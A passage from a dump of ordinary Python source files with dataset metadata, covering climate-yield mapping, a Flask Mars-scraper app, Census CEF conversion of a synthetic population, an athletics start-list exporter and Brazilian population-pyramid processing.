up the shape obect for a state by it's name\n names = [];colors = {};i=0\n for shape_dict in m.states_info:\n names.append(shape_dict['HASC_1'])\n if (shape_dict['HASC_1']=='AR.DF')|(shape_dict['HASC_1']=='AR.SC')|(shape_dict['HASC_1']=='AR.TF'):\n colors[shape_dict['HASC_1']]=0\n elif len(np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0]) != 0:\n colors[shape_dict['HASC_1']]=CRpct_diff[np.where(eof_states==eofSTs[shape_dict['HASC_1']])[0][0]]\n else: colors[shape_dict['HASC_1']]=0\n ax = plt.gca() # get current axes instance\n for nshape, seg in enumerate(m.states):\n poly = Polygon(seg,facecolor=mapper.to_rgba(colors[names[nshape]]), edgecolor='k')\n ax.add_patch(poly) \n mapper.set_array(clrBr);plt.colorbar(mapper)\n plt.savefig('/Users/weston/Desktop/Columbia/Research/Results/ENSO_varTrnds/yldComposite/'+crop+'/SouthAmerica_'+avg+comp+str(pvalThresh)+'.png')\n plt.close() ","sub_path":"ENSO induced variability composite.py","file_name":"ENSO induced variability composite.py","file_ext":"py","file_size_in_byte":18494,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"350251895","text":"from flask import Flask, render_template\nfrom scrape_mars import scrape\nimport datetime as dt\nimport pymongo\n\n# Initialize flask app\napp = Flask(__name__)\n\n# Establish mongo connection, db, and collection\nconn = 'mongodb://localhost:27017'\nclient = pymongo.MongoClient(conn)\ndb = client.mars_db\nmars = db.mars_scrape\n\n# Home Route\n@app.route('/')\ndef index():\n mars_dict = db.mars.find_one()\n # Need to find newest entry\n # scrapeQ = db.mars.find().sort({'scrape_date' : -1})\n return render_template('index.html', mars_dict = mars_dict)\n\n@app.route('/scraper')\ndef scraper():\n # Run scrape function to gather mars data\n mars_dict = scrape()\n mars_dict['scrape_date'] = dt.datetime.now()\n db.mars.insert_one(mars_dict)\n return render_template('index.html', mars_dict = mars_dict)\n\n\n# Debugger on\nif __name__ == \"__main__\":\n app.run(debug = True)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"401157705","text":"# -*- coding:utf-8 -*-\n# create_time: 2018/7/6 10:04\n__author__ = 'brad'\n\nimport sys\nprint(sys.getdefaultencoding())\n\n\nclass a(object):\n def __init__(self, b):\n self.b = b\n\n @classmethod\n def test(cls, b):\n return cls(*[b])\n\n\nc = a.test(u'这个')\nprint(c.b)\n","sub_path":"a_concept/unicode_learn/py2-learn.py","file_name":"py2-learn.py","file_ext":"py","file_size_in_byte":282,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"64369070","text":"from ftw.upgrade import UpgradeStep\n\n\nclass UpdateTaskTemplateFolderWorkflow(UpgradeStep):\n \"\"\"Update task template folder workflow.\n \"\"\"\n\n def __call__(self):\n self.install_upgrade_profile()\n self.update_workflow_security(\n ['opengever_tasktemplatefolder_workflow'],\n reindex_security=False)\n","sub_path":"opengever/tasktemplates/upgrades/20170516145806_update_task_template_folder_workflow/upgrade.py","file_name":"upgrade.py","file_ext":"py","file_size_in_byte":338,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"} +{"seq_id":"63400616","text":"import argparse\nimport csv\nimport numpy as np\nimport os\nimport pandas as pd\n\n# Still not sure what version is used for\nVERSION = 12345\n\ndef get_script_args():\n parser = 
argparse.ArgumentParser(\n description='Convert synthetic population file to CEF formatted person and unit files'\n )\n parser.add_argument(\n 'grfc_path', \n metavar='GRFC_PATH', \n help='path to grfc file that will be used to run the DAS'\n )\n parser.add_argument(\n 'synth_path',\n metavar='SYNTH_PATH',\n help=('path to synthetic population file to convert - '\n 'if path is a single file, will convert only that file,'\n 'if path is a directory, will convert all the files in the' \n 'given directory (one level deep)')\n )\n\n args = parser.parse_args()\n\n grfc_path = os.path.expanduser(os.path.expandvars(args.grfc_path))\n\n if not os.path.exists(grfc_path):\n print(f'Error: Could not find grfc file path: {grfc_path}')\n exit(1)\n\n synth_path = os.path.expanduser(os.path.expandvars(args.synth_path))\n\n if not os.path.exists(synth_path):\n print(f'Error: Could not find synthetic population file path: {synth_path}')\n exit(1)\n\n return (grfc_path, synth_path)\n\ndef gen_mafids(hh_gb):\n group_keys = hh_gb.groups.keys()\n\n return dict(zip(group_keys, range(len(group_keys))))\n\n\ndef load_synth_df(grfc_path, synth_path):\n\n if os.path.isdir(synth_path):\n dfs = (pd.read_csv(os.path.join(synth_path, path), index_col=0) \n for path in os.listdir(synth_path)\n if os.path.isfile(os.path.join(synth_path, path)))\n synth_df = pd.concat(dfs) \n else:\n synth_df = pd.read_csv(synth_path, index_col=0)\n\n grfc_df = pd.read_csv(\n grfc_path, \n delimiter='|', \n usecols=[\n 'TABBLKST', \n 'TABBLKCOU',\n 'TABTRACTCE',\n 'TABBLKGRPCE', \n 'TABBLK', \n 'OIDTABBLK'\n ]\n )\n # Not sure if there's a better way to do this...\n grfc_df['geoid'] = (\n grfc_df['TABBLKST'].astype(str).str.zfill(2)\n + grfc_df['TABBLKCOU'].astype(str).str.zfill(3)\n + grfc_df['TABTRACTCE'].astype(str).str.zfill(6)\n + grfc_df['TABBLK'].astype(str).str.zfill(4)\n ).astype(int)\n\n # TODO: Our massive GRFC file doesn't have a lot of blocks still\n # Might be worth inquiring with the Census bureau about this\n return synth_df.join(\n grfc_df.set_index('geoid'), \n on='geoid'\n ).dropna(subset=['OIDTABBLK']).reset_index().astype(int)\n\ndef build_per_df(synth_df, hh_gb, mafids):\n per_fields = ['RTYPE', 'MAFID', 'CUF_PNC', 'BCUSTATEFP', 'VERSION', 'QSEX', 'QAGE', 'QDB', 'QDOB_MONTH', 'QDOB_DAY', 'QDOB_YEAR', 'QSPAN', 'QSPANX', 'CENHISP', 'QRACE1', 'QRACE2', 'QRACE3', 'QRACE4', 'QRACE5', 'QRACE6', 'QRACE7', 'QRACE8', 'QRACEX', 'CENRACE', 'RACE2010', 'RELSHIP', 'QGQTYP', 'LIVE_ALONE']\n per_df = pd.DataFrame(index=np.arange(synth_df.shape[0]), columns=per_fields)\n\n per_df['RTYPE'] = np.where(synth_df['relationship'].isin([37, 38]), 5, 3)\n # Need to add 100000001 to make the value valid\n per_df['MAFID'] = synth_df.apply(\n lambda row: mafids[(row['geoid'], row['hh_id'])] + 100000001,\n axis=1\n )\n # TODO: still don't know what CUF_PNC is\n per_df['CUF_PNC'] = 12345\n per_df['BCUSTATEFP'] = synth_df['state']\n # TODO: also don't know what VERSION is\n per_df['VERSION'] = VERSION\n per_df['QSEX'] = synth_df['sex_id']\n per_df['QAGE'] = synth_df['age']\n per_df['QDOB_YEAR'] = 2020 - synth_df['age']\n # TODO: do we care about birth month/day?\n per_df['QDOB_MONTH'] = 1\n per_df['QDOB_DAY'] = 1\n per_df['QDB'] = (per_df['QDOB_YEAR'].astype(str) \n + per_df['QDOB_MONTH'].astype(str).str.zfill(2)\n + per_df['QDOB_DAY'].astype(str).str.zfill(2))\n # TODO: don't know exactly what the Edit/Allocation group is\n per_df['QRACEX'] = 1\n per_df['QSPANX'] = 1\n # TODO: don't know exactly what the Q codes are\n per_df['QSPAN'] = 1000\n 
per_df['QRACE1'] = 1000\n per_df['QRACE2'] = 1000\n per_df['QRACE3'] = 1000\n per_df['QRACE4'] = 1000\n per_df['QRACE5'] = 1000\n per_df['QRACE6'] = 1000\n per_df['QRACE7'] = 1000\n per_df['QRACE8'] = 1000\n per_df['CENRACE'] = synth_df.apply(lambda row: get_cenrace(\n row['racsor'],\n row['racnhpi'],\n row['racasn'],\n row['racaian'],\n row['racblk'],\n row['racwht']\n ), axis=1).astype(str).str.zfill(2)\n per_df['RACE2010'] = synth_df.apply(lambda row: get_race2010(\n row['racnhpi'],\n row['racasn'],\n row['racaian'],\n row['racblk'],\n row['racwht']\n ), axis=1).astype(str).str.zfill(2)\n # For some reason CENHISP is 1 and 2 instead of 0 and 1...\n per_df['CENHISP'] = synth_df['hispanic'] + 1\n # RELSHIP range seems to be 20-38 but not documented anywhere\n per_df['RELSHIP'] = synth_df['relationship']\n # NIU but 000 isn't allowed?\n per_df['QGQTYP'] = ' '\n # Everyone living alone (for now)\n per_df['LIVE_ALONE'] = synth_df.apply(\n lambda row: 0 if hh_gb.get_group((row['geoid'], row['hh_id'])).shape[0] > 1 else 1,\n axis=1\n )\n \n return per_df\n\ndef write_unit_df(synth_df, per_df, hh_gb, mafids):\n with open('converted_synth_unit.cef', 'w', newline='') as unit_file:\n unit_writer = csv.writer(unit_file, delimiter='|')\n\n for (geoid, hh_id), household in hh_gb:\n mafid = mafids[(geoid, hh_id)]\n unit_writer.writerow(get_unit_row(household, hh_id, mafid))\n \ndef get_unit_row(household, hh_id, mafid):\n head_of_household = get_head_of_household(household)\n unit_rtype = 4 if household['relationship'].isin([37, 38]).any() else 2\n # TODO: this is always free and clear - should we set it to something else?\n unit_ten = 2\n unit_paoc = get_paoc(household, unit_rtype)\n # why don't these just match? :(\n # Should be able to subtract 1 from person RTYPE\n return [\n unit_rtype, # RTYPE\n 100000001 + mafid, # MAFID\n head_of_household['state'].item(), # BCUSTATEFP\n VERSION, # VERSION\n household.shape[0], # FINAL_POP\n head_of_household['age'] if head_of_household['age'] >= 15 else 15, # HHLDRAGE\n get_hhspan(household, unit_rtype), # HHSPAN\n 1, # HHLDRACE - CEF validator describes as \"Edited QRACEX of householder\", not sure what that means\n str(get_hhrace(household, unit_rtype)).zfill(2), # HHRACE\n unit_ten, # TEN\n # Zero clue what these are still, we will match TEN for now\n unit_ten, # TEN_A\n unit_ten, # TEN_R\n 0, # VACS - I think should be NIU since it's not vacant\n ' ', # QGQTYP - TODO: Do we want to assign a GQ type?\n ' ', # GQSEX - CEF Validator says \"GQ Unit Sex Composition Flag\"???\n head_of_household['OIDTABBLK'].astype(np.int64).item(), # OIDTB\n get_hht(household, unit_rtype), # HHT\n str(get_hht2(household, unit_rtype)).zfill(2), # HHT2\n get_cplt(household, unit_rtype), # CPLT\n get_upart(household, unit_rtype), # UPART\n get_multg(household, unit_rtype), # MULTG\n get_paoc(household, unit_rtype), # PAOC\n get_p18(household, unit_rtype), # P18\n get_p60(household, unit_rtype), # P60\n get_p65(household, unit_rtype), # P65\n get_p75(household, unit_rtype), # P75\n 1 if unit_paoc in [1, 2, 3] else 0, # PAC\n get_hhsex(household, unit_rtype), # HHSEX\n ]\n\ndef get_head_of_household(household):\n possible = household[household['relationship'].isin([20])]\n if possible.shape[0] > 0:\n # Arbitrarily return first row\n return possible.iloc[0]\n else:\n # Arbitrarily return first row\n # TODO: it'd be nice to be able to rely on having a householder\n # Then we can replace this case with a error\n return household.iloc[0]\n\ndef get_hht(household, rtype):\n hhsize = 
household.shape[0]\n    rels = household['relationship']\n    rels_no_hh = rels[rels != 20]\n    hhsex = get_head_of_household(household)['sex_id'].item()\n    # 14 is female householder nonfamily\n    if (rtype == 4) or (rtype == 2 and hhsize == 0):\n        return 0\n    elif (hhsize > 1) and (rels.isin([21, 23]).any()):\n        return 1\n    elif (hhsize > 1) and (hhsex == 1) and (rels.isin(np.arange(25, 34)).any()):\n        return 2\n    elif (hhsize > 1) and (hhsex == 2) and (rels.isin(np.arange(25, 34)).any()):\n        return 3\n    elif (hhsize == 1) and (hhsex == 1):\n        return 4\n    elif (hhsize > 1) and (hhsex == 1) and (rels_no_hh.isin([22, 24, 34, 35, 36]).all()):\n        return 5\n    elif (hhsize == 1) and (hhsex == 2):\n        return 6\n    elif (hhsize > 1) and (hhsex == 2) and (rels_no_hh.isin([22, 24, 34, 35, 36]).all()):\n        return 7\n    else:\n        hh_id = household['hh_id'].iloc[0].item()\n        raise ValueError(f\"Could not generate hht for household w/id: {hh_id}\\n\"\n                         f\"Household relationships: {list(rels)}\")\n\ndef get_hht2(household, rtype):\n    hhsize = household.shape[0]\n    household_under_18 = household[household['age'] < 18]\n    rels = household['relationship']\n    rels_under_18 = household_under_18['relationship']\n    hhsex = get_head_of_household(household)['sex_id'].item()\n    if (rtype == 4) or (rtype == 2 and hhsize == 0):\n        return 0\n    elif (hhsize > 1) and (rels.isin([21, 23]).any()) and (rels_under_18.isin([25, 26, 27]).any()):\n        return 1\n    elif (hhsize > 1) and (rels.isin([21, 23]).any()):\n        return 2\n    elif (hhsize > 1) and (rels.isin([22, 24]).any()) and (rels_under_18.isin([25, 26, 27]).any()):\n        return 3\n    elif (hhsize > 1) and (rels.isin([22, 24]).any()):\n        return 4\n    elif (hhsize == 1) and (hhsex == 2):\n        return 5\n    elif (hhsize > 1) and (hhsex == 2) and (rels_under_18.isin([25, 26, 27]).any()):\n        return 6\n    elif (hhsize > 1) and (hhsex == 2) and (rels.isin(np.arange(25, 34)).any()):\n        return 7\n    elif (hhsize > 1) and (hhsex == 2) and (rels.isin([34, 35, 36]).any()):\n        return 8\n    elif (hhsize == 1) and (hhsex == 1):\n        return 9\n    elif (hhsize > 1) and (hhsex == 1) and (rels_under_18.isin([25, 26, 27]).any()):\n        return 10\n    elif (hhsize > 1) and (hhsex == 1) and (rels.isin(np.arange(25, 34)).any()):\n        return 11\n    elif (hhsize > 1) and (hhsex == 1) and (rels.isin([34, 35, 36]).any()):\n        return 12\n    elif (hhsize > 1) and (rels.isin([20]).all()):\n        # TODO: we really shouldn't have this case\n        # Need to know there is only one householder per unit to remove it\n        return 11\n    else:\n        hh_id = household['hh_id'].iloc[0].item()\n        raise ValueError(f\"Could not generate hht2 for household w/id: {hh_id}\\n\"\n                         f\"Household relationships: {list(rels)}\")\n    \ndef get_cplt(household, rtype):\n    hhsize = household.shape[0]\n    rels = household['relationship']\n    if (rtype == 4) or ((rtype == 2) and (hhsize <= 1)):\n        return 0\n    elif rels.isin([21]).any():\n        return 1\n    elif rels.isin([23]).any():\n        return 2\n    elif rels.isin([22]).any():\n        return 3\n    elif rels.isin([24]).any():\n        return 4\n    else:\n        return 5\n\ndef get_upart(household, rtype):\n    hhsize = household.shape[0]\n    rels = household['relationship']\n    hhsex = get_head_of_household(household)['sex_id'].item()\n    # materialize the pairs: a bare zip() generator would be exhausted by the first membership test below\n    sex_rels = list(zip(household['sex_id'], rels))\n    if (rtype == 4) or (rtype == 2 and hhsize == 0):\n        return 0\n    elif (hhsize > 1) and (hhsex == 1) and ((1, 24) in sex_rels):\n        return 1\n    elif (hhsize > 1) and (hhsex == 1) and ((2, 22) in sex_rels):\n        return 2\n    elif (hhsize > 1) and (hhsex == 2) and ((2, 24) in sex_rels):\n        return 3\n    elif (hhsize > 1) and (hhsex == 2) and ((1, 22) in sex_rels):\n        return 4 \n    
else:\n return 5\n\ndef get_multg(household, rtype):\n hhsize = household.shape[0]\n rels = household['relationship']\n if (rtype == 4) or (hhsize <= 2):\n return 0\n elif (rels.isin([25, 26, 27]).any() and rels.isin([30]).any()) or (rels.isin([29,31]).any()):\n return 2\n else:\n return 1\n\ndef get_hhldrage(household, rtype):\n hhsize = household.shape[0]\n hhage = get_head_of_household(household)['age'].item()\n if (rtype == 4) or (hhsize == 0):\n return 0\n elif (hhage < 25):\n return 1\n elif (hhage < 35):\n return 2\n elif (hhage < 45):\n return 3 \n elif (hhage < 55):\n return 4\n elif (hhage < 60):\n return 5\n elif (hhage < 65):\n return 6\n elif (hhage < 75):\n return 7\n elif (hhage < 85):\n return 8\n else:\n return 9\n\ndef get_hhspan(household, rtype):\n hhsize = household.shape[0]\n return get_head_of_household(household)['hispanic'].item() + 1\n # TODO: Specified recode (below) not accepted by validator\n # if (rtype == 4) or (hhsize == 0):\n # return 0\n # else:\n # return get_head_of_household(household)['hispanic'].item() + 1\n\ndef get_hhrace(household, rtype):\n hhsize = household.shape[0]\n householder = get_head_of_household(household)\n hhrace = get_cenrace(\n householder['racsor'].item(),\n householder['racnhpi'].item(),\n householder['racasn'].item(),\n householder['racaian'].item(),\n householder['racblk'].item(),\n householder['racwht'].item()\n )\n\n return hhrace\n\n # TODO: Specified recode (below) not accepted by validator\n # if (rtype == 4) or (hhsize == 0):\n # return 0\n # elif hhrace < 7:\n # return hhrace\n # else:\n # return 7\n\ndef get_paoc(household, rtype):\n hhsize = household.shape[0]\n household_under_6_rels = household[household['age'] < 6]['relationship']\n household_6_to_17_rels = household[(household['age'] >= 6) & (household['age'] <= 17)]['relationship']\n\n children_under_6 = household_under_6_rels.isin([25, 26, 27]).any()\n children_6_to_17 = household_6_to_17_rels.isin([25, 26, 27]).any()\n if (rtype == 4) or (hhsize == 0):\n return 0\n elif hhsize > 1 and children_under_6 and not children_6_to_17:\n return 1\n elif hhsize > 1 and not children_under_6 and children_6_to_17:\n return 2\n elif hhsize > 1 and children_under_6 and children_6_to_17:\n return 3\n else:\n return 4\n\ndef get_p18(household, rtype):\n if rtype == 2 and household[household['age'] < 18].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_p60(household, rtype):\n if rtype == 2 and household[household['age'] >= 60].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_p65(household, rtype):\n if rtype == 2 and household[household['age'] >= 65].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_p75(household, rtype):\n if rtype == 2 and household[household['age'] >= 75].shape[0] > 0:\n return 1\n else:\n return 0\n\ndef get_hhsex(household, rtype):\n hhsize = household.shape[0]\n if rtype == 4 or hhsize == 0:\n return 0\n else:\n return get_head_of_household(household)['sex_id'].item()\n\n\ndef get_cenrace(sor, nhpi, asn, aian, blk, wht):\n indicator_str = (str(int(sor))\n + str(int(nhpi))\n + str(int(asn))\n + str(int(aian))\n + str(int(blk))\n + str(int(wht)))\n if indicator_str == '000001': return 1\n elif indicator_str == '000010': return 2\n elif indicator_str == '000100': return 3\n elif indicator_str == '001000': return 4\n elif indicator_str == '010000': return 5\n elif indicator_str == '100000': return 6\n elif indicator_str == '000011': return 7\n elif indicator_str == '000101': return 8\n elif indicator_str == '001001': return 9\n elif 
indicator_str == '010001': return 10\n elif indicator_str == '100001': return 11\n elif indicator_str == '000110': return 12\n elif indicator_str == '001010': return 13\n elif indicator_str == '010010': return 14\n elif indicator_str == '100010': return 15\n elif indicator_str == '001100': return 16\n elif indicator_str == '010100': return 17\n elif indicator_str == '100100': return 18\n elif indicator_str == '011000': return 19\n elif indicator_str == '101000': return 20\n elif indicator_str == '110000': return 21\n elif indicator_str == '000111': return 22\n elif indicator_str == '001011': return 23\n elif indicator_str == '010011': return 24\n elif indicator_str == '100011': return 25\n elif indicator_str == '001101': return 26\n elif indicator_str == '010101': return 27\n elif indicator_str == '100101': return 28\n elif indicator_str == '011001': return 29\n elif indicator_str == '101001': return 30\n elif indicator_str == '110001': return 31\n elif indicator_str == '001110': return 32\n elif indicator_str == '010110': return 33\n elif indicator_str == '100110': return 34\n elif indicator_str == '011010': return 35\n elif indicator_str == '101010': return 36\n elif indicator_str == '110010': return 37\n elif indicator_str == '011100': return 38\n elif indicator_str == '101100': return 39\n elif indicator_str == '110100': return 40\n elif indicator_str == '111000': return 41\n elif indicator_str == '001111': return 42\n elif indicator_str == '010111': return 43\n elif indicator_str == '100111': return 44\n elif indicator_str == '011011': return 45\n elif indicator_str == '101011': return 46\n elif indicator_str == '110011': return 47\n elif indicator_str == '011101': return 48\n elif indicator_str == '101101': return 49\n elif indicator_str == '110101': return 50\n elif indicator_str == '111001': return 51\n elif indicator_str == '011110': return 52\n elif indicator_str == '101110': return 53\n elif indicator_str == '110110': return 54\n elif indicator_str == '111010': return 55\n elif indicator_str == '111100': return 56\n elif indicator_str == '011111': return 57\n elif indicator_str == '101111': return 58\n elif indicator_str == '110111': return 59\n elif indicator_str == '111011': return 60\n elif indicator_str == '111101': return 61\n elif indicator_str == '111110': return 62\n elif indicator_str == '111111': return 63\n else: raise ValueError('Incorrect race indicator: ' + indicator_str)\n\ndef get_race2010(nhpi, asn, aian, blk, wht):\n indicator_str = (str(int(nhpi))\n + str(int(asn))\n + str(int(aian))\n + str(int(blk))\n + str(int(wht)))\n if indicator_str == '00001': return 1\n elif indicator_str == '00010': return 2\n elif indicator_str == '00100': return 3\n elif indicator_str == '01000': return 4\n elif indicator_str == '10000': return 5\n elif indicator_str == '00011': return 6\n elif indicator_str == '00101': return 7\n elif indicator_str == '01001': return 8\n elif indicator_str == '10001': return 9\n elif indicator_str == '00110': return 10\n elif indicator_str == '01010': return 11\n elif indicator_str == '10010': return 12\n elif indicator_str == '01100': return 13\n elif indicator_str == '10100': return 14\n elif indicator_str == '11000': return 15\n elif indicator_str == '00111': return 16\n elif indicator_str == '01011': return 17\n elif indicator_str == '10011': return 18\n elif indicator_str == '01101': return 19\n elif indicator_str == '10101': return 20\n elif indicator_str == '11001': return 21\n elif indicator_str == '01110': return 22\n elif indicator_str == 
'10110': return 23\n elif indicator_str == '11010': return 24\n elif indicator_str == '11100': return 25\n elif indicator_str == '01111': return 26\n elif indicator_str == '10111': return 27\n elif indicator_str == '11011': return 28\n elif indicator_str == '11101': return 29\n elif indicator_str == '11110': return 30\n elif indicator_str == '11111': return 31\n elif indicator_str == '00000': return 1 # This means they are SOR which wasn't part of 2010... :( \n else: raise ValueError('Incorrect race indicator: ' + indicator_str)\n\ndef main():\n grfc_path, synth_path = get_script_args()\n\n print(\"Loading synthetic population dataframe...\")\n synth_df = load_synth_df(grfc_path, synth_path)\n\n hh_gb = synth_df.groupby(['geoid', 'hh_id'])\n\n mafids = gen_mafids(hh_gb)\n\n print(\"Building CEF person dataframe...\")\n per_df = build_per_df(synth_df, hh_gb, mafids)\n\n print(\"Writing CEF unit dataframe...\")\n write_unit_df(synth_df, per_df, hh_gb, mafids)\n\n print(\"Writing CEF person dataframe...\")\n per_df.to_csv('converted_synth_pop.cef', sep='|', index=False, header=False)\n\n print(\"Done!\")\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"util/convert_synth_pop.py","file_name":"convert_synth_pop.py","file_ext":"py","file_size_in_byte":21126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"470375690","text":"import numpy as np\nimport mojimoji\nimport pandas as pd\n\nfrom django.db.models.aggregates import Count\nfrom django.db.models import Max\nfrom django.core.exceptions import ObjectDoesNotExist\n\n# Models\nfrom competitions.models import Comp, Event, EventStatus, GR as GRecord\nfrom organizer.models import Entry\nfrom organizer.templatetags.organizer_tags import format_mark\nfrom organizer.templatetags.organizer_filters import zen_to_han, sex_to_ja, race_section_to_ja\n\n\n\"\"\"\nJyoriku integration tool\n\"\"\"\nclass JyorikuTool:\n    def __init__(self, comp):\n        self.comp = comp  # Comp object\n\n    \"\"\"\n    Cardinal System: backup CSV\n    \"\"\"\n    def start_list_cardinal(self):\n        self.columns = ['section', 'sex', 'round', 'group', 'order_lane', 'event', 'bib', 'name', 'kana', 'grade', 'club', 'jaaf_branch', 'PB', 'entry_status']\n        df = pd.DataFrame(columns=self.columns)\n\n        # Fetch the Entry objects\n        entries = Entry.objects.filter(event_status__comp=self.comp).order_by('event_status__event__name', '-event_status__section', 'event_status__event__sex', 'group', 'order_lane')\n        for entry in entries:\n            # print(entry)\n            # Sex\n            if entry.sex == 'M': sex = \"男\"\n            elif entry.sex == 'W': sex = \"女\"\n            else: sex = \"\"\n            # School year\n            if entry.grade: grade = entry.grade\n            else: grade = \"\"\n            # Affiliated club\n            if entry.club: club = entry.club\n            else: club = \"\"\n            # PB\n            if entry.personal_best: pb = entry.personal_best\n            else: pb = \"\"\n            # Build a pandas Series\n            series = pd.Series([\n                entry.event_status.section,\n                sex,\n                entry.event_status.match_round,\n                entry.group,\n                entry.order_lane,\n                entry.event_status.event.name,\n                entry.bib,\n                entry.name_family+\"\\u3000\"+entry.name_first,\n                mojimoji.zen_to_han(entry.kana_family+\"\\u3000\"+entry.kana_first),\n                grade,\n                club,\n                entry.jaaf_branch,\n                pb,\n                entry.entry_status,\n            ], index=self.columns)\n            df = pd.concat([df, series.to_frame().T], ignore_index=True)\n\n        # dtype conversion\n        df[[\"group\", \"order_lane\"]] = df[[\"group\", \"order_lane\"]].astype(int)\n        # print(df.head())\n        # print(df.shape)\n\n        return df\n\n    \"\"\"\n    Jyoriku start list\n    \"\"\"\n    def start_list_jyoriku(self):\n        df = self.start_list_cardinal()\n        # print(df[df['group'] < 0].index)\n        df = df.drop(df[df['group'] < 0].index)\n        print(df.head(20))\n\n        # Convert to the Jyoriku format\n        ## Blank columns\n        df[\"space1\"] = [\"\" for i in range(len(df))]\n        df[\"space2\"] = [\"\" for i in range(len(df))]\n        # print(df.columns)\n        ## Section\n        for i in df[df[\"section\"] == 'VS'].index:\n            df.loc[i, \"section\"] = '対校'\n        df[\"section\"] = df[\"sex\"] + df[\"section\"]\n        ## Bib number\n        # print(df[df['bib'].str.find('-') >= 0])\n        for i in df[df['bib'].str.find('-') >= 0].index:\n            df.loc[i, 'bib'] = str(df.loc[i, 'bib']).replace('-', '')[:5]\n        ## Club name in kana\n        df[\"club_kana\"] = [\"\" for i in range(len(df))]\n\n        # Select the required columns\n        df = df.loc[:, ['section', 'space1', 'event', 'group', 'order_lane', 'space2', 'bib', 'name', 'kana', 'grade', 'club', 'club_kana', 'jaaf_branch']]\n        # print(df)\n\n        return df\n","sub_path":"app/organizer/jyoriku.py","file_name":"jyoriku.py","file_ext":"py","file_size_in_byte":3647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"207496691","text":"class Person():\n    sex = \"\"\n    age = \"\"\n    first_name = \"\"\n    second_name = \"\"\n\n    def __str__(self):\n        return f\"\"\"\n        Nominativo: {self.first_name} {self.second_name}\n        Età: {self.age}\n        Sesso: {self.sex}\n        \"\"\"\n\n\nclass Student(Person):\n    class_session = \"\"\n\n    def __str__(self):\n        return f\"\"\"\n        Nominativo: {self.first_name} {self.second_name}\n        Età: {self.age}\n        Sesso: {self.sex}\n        Classe frequentata: {self.class_session}\n        \"\"\"\n\nclass Teacher(Person):\n    pass\n\nperson = Student()\nperson.sex = \"m\"\nperson.age = \"45\"\nperson.first_name = \"Luca\"\nperson.second_name = \"Bellomi\"\nperson.class_session = \"3 B\"\n\nprint(person)\n","sub_path":"prova.py","file_name":"prova.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"16"}
+{"seq_id":"124073712","text":"#\n# DATA EXTRACTED FROM:\n#\n# FREIRE, F.H.M.A; GONZAGA, M.R; QUEIROZ, B.L. Projeção populacional municipal\n# com estimadores bayesianos, Brasil 2010 - 2030. In: Sawyer, D.O (coord.).\n# Seguridade Social Municipais. Projeto Brasil 3 Tempos. Secretaria Especial\n# de Assuntos Estratégicos da Presidência da República (SAE/SG/PR) , United\n# Nations Development Programme, Brazil (UNDP) and International Policy Centre\n# for Inclusive Growth. 
Brasília (IPC-IG), 2019\n#\nfrom pathlib import Path\n\nimport pandas as pd\n\nPATH = Path(__file__).parent.resolve()\nDEST = PATH / \"processed\"\n\n\ndef fix_columns(df, name):\n    \"\"\"\n    Create multi-index for male/female columns of age distributions\n    \"\"\"\n    df.columns = pd.MultiIndex.from_tuples(\n        ((name, int(x)) for x in df.columns), names=[\"gender\", \"age\"]\n    )\n    return df\n\n\n# Read raw data and transform a few columns\ndata = pd.read_csv(PATH / \"age-distribution.csv.gz\")\ndata = data.drop(columns=[\"name\", \"state\", \"total\"])\ndata[\"id\"] = data.pop(\"code\").apply(lambda x: f\"BR-{x}\")\ndata[\"95\"] = data[\"100\"] = 0\n\nprint(\"Raw data loaded\")\n\n\n###############################################################################\n# Group by municipality and append two columns for male/female distributions\n\n\ndef T(df, gender):\n    df = (\n        df[df[\"gender\"] == gender]\n        .set_index([\"id\", \"year\"])\n        .drop(columns=\"gender\")\n        .sort_index()\n        .astype(\"int32\")\n    )\n    data = ((gender, int(x)) for x in df.columns)\n    df.columns = pd.MultiIndex.from_tuples(data, names=[\"gender\", \"age\"])\n    return df\n\n\ndata = data.replace({\"f\": \"female\", \"m\": \"male\"})\nmale = T(data, \"male\")\nfemale = T(data, \"female\")\ndata = pd.concat([female, male], axis=1)\n\n# Projections for Brazilian population pyramid. Override UN projections\nbrazil = (\n    data.reset_index()\n    .set_index(\"year\")\n    .drop(columns=\"id\")\n    .groupby(\"year\")\n    .sum()\n    .reset_index()\n)\nbrazil[\"id\"] = \"BR\"\ndata = pd.concat([data, brazil.set_index([\"id\", \"year\"])])\n\n\n###############################################################################\n# TODO: fix sub-regions\n\n# # Save data for municipalities\nprint(\"- Saving age pyramid\")\ndata.to_pickle(DEST / f\"yearly-age-pyramid-C1.pkl.gz\")\n\n# Save age distribution\nprint(\"- Saving age distribution (not separated by gender)\")\n(data[\"male\"] + data[\"female\"]).to_pickle(DEST / f\"yearly-age-distribution-C1.pkl\")\n\n# Save total population\nprint(\"- Saving total population projections\")\ndata.sum(1).to_pickle(DEST / f\"yearly-population-C1.pkl\")\nprint(\"Files saved\")\n\n\n###############################################################################\n# Filtering current year\n\nprint(\"Filtering current year...\")\nyear = 2020\npyramid = data.reset_index()\npyramid = pyramid[pyramid[\"year\"] == year].drop(columns=\"year\").set_index(\"id\")\n\n# Save data for current year\nprint(\"Saving age pyramid\")\npyramid.to_pickle(DEST / f\"age-pyramid-C1.pkl\")\n\nprint(\"Saving age distribution\")\n(pyramid[\"male\"] + pyramid[\"female\"]).to_pickle(DEST / f\"age-distribution-C1.pkl\")\n\nprint(\"Saving total populations\")\npop = pd.DataFrame({\"population\": pyramid.sum(1)})\npop.to_pickle(DEST / f\"population-C1.pkl\")\n\nprint(\"\\nCurrent year distributions 